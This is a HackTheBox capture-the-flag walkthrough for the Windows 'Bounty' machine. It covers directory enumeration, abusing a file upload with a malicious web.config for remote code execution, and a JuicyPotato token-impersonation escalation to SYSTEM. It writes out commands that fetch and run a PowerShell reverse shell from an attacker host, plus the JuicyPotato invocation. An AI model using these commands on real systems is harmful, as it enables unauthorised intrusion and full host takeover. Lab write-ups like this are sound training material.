HackTheBox “Bounty” Walkthrough
Bounty, an easy-level Windows OS machine on HackTheBox, a straightforward Windows challenge, where the objective was to exploit a Windows ASP web server by uploading a web.config file. This allowed for remote code execution, and by leveraging token impersonation technique, the goal was to escalate privileges to the system level.
Let’s get started! 🚀
Recon & Enumeration
Let’s use nmap to scan for open ports and services:
Visit the target on port 80.
Perform a directory scan on the Microsoft IIS server using the “Feroxbuster” tool. Utilize a larger wordlist built in Kali machine targeting the extensions asp, aspx, and txt using the following command:
feroxbuster -u http://10.10.10.93/ -x asp,aspx,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 100 -s 200,301 -n
Visit the transfer.aspx page.
The website has a file upload feature. When we try to upload a PNG file, the site confirms its successful upload, and the image can be viewed at http://10.10.10.93/UploadedFiles/[image name] which is the second directory discovered by Feroxbuster above.
Browse for the Bounty machine info image.
Upload.
Verify.
We will use Burp intruder to determine the allowed extensions by intercepting the file upload request.
Utilizing Burp Suite for intercepting the upload request of the bounty information image.
Send it to the Intruder.
We put the selection of the Sniper attack type to the file extension as the parameter for payload replacement.
We will use the raft-small-extensions.txt wordlist from [SecLists] and move it to the working directory.
To prevent URL encoding in Burp, use the “Cut” tool to remove the dots.
In the “Payloads” tab, select the “Runtime file” as a pyload type and browse for the wordlist we prepared.
Start the attack.
One of the allowed extensions seems to be “config.”
Upon conducting some research, I found a compelling web.config file that enables Remote Code Execution (RCE) by exploiting the file upload functionality. To proceed, we will download the file to our attack box and configure it with the appropriate path for downloading the Nishang Invoke-PowerShellTcp PowerShell script.
Download and prepare the Nishang Invoke-PowerShellTcp PowerShell script by appending it with the command below.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4343
Start an HTTP server in the current directory.
Start a listener.
Browse for the web.config file.
Upload.
Trigger it on the URL http://10.10.10.93/UploadedFiles/web.config
On our HTTP server we notice that the powershell script has been downloaded.
And we get a shell on our listener.
Start a system information enumeration.
The obtained information reveals valuable details. Firstly, the OS is Windows Server 2008 R2 without any installed hotfixes, indicating vulnerability to a kernel exploit. Moreover, it confirms that the host operates on a 64-bit system, which is pertinent when utilizing tools.
Subsequently, I proceeded to collect information about the current user’s privileges using the following command:
The finding of enabled SeImpersonatePrivilege implies that I can leverage a potato attack to escalate privileges to SYSTEM.
Obtain a copy of JuicyPotato.exe from this GitHub repository here, ensure to acquire the 64-bit version of the executable.
Meanwhile, our HTTP server in the working directory of our attacking box remains operational.
Create a temp directory within the C partition and proceed to download JuicyPotato onto the target machine using the command below.
(new-object net.webclient).downloadfile('http://10.10.14.8:8080/JuicyPotato.exe', '\temp\JuicyPotato.exe')pla
Let’s run the exploit.
In order to run the tool successfully, we require a port number for the COM server and a valid CLSID. There are two options: either use the provided list by the tool authors corresponding to the system version or execute the following PowerShell script to extract the CLSID of the current system:
I will use a batch script to download the Nishang PowerShell script. On the attacker machine, use the following command to craft a batch script:
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
Download the batch script onto the target box using the command below.
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8:8080/shell.bat', '\temp\shell.bat')
The setup is complete, and we are ready to proceed with the exploit. In case the default CLSID fails, the exploit publisher has provided a list of alternative CLSIDs for testing, available here.
Considering that the target system runs Windows Server 2008 R2, the following CLSIDs are applicable:
Start a listener.
Let’s proceed with using the first CLSID from the list.
./JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
A SYSTEM shell is obtained.
Cheers.
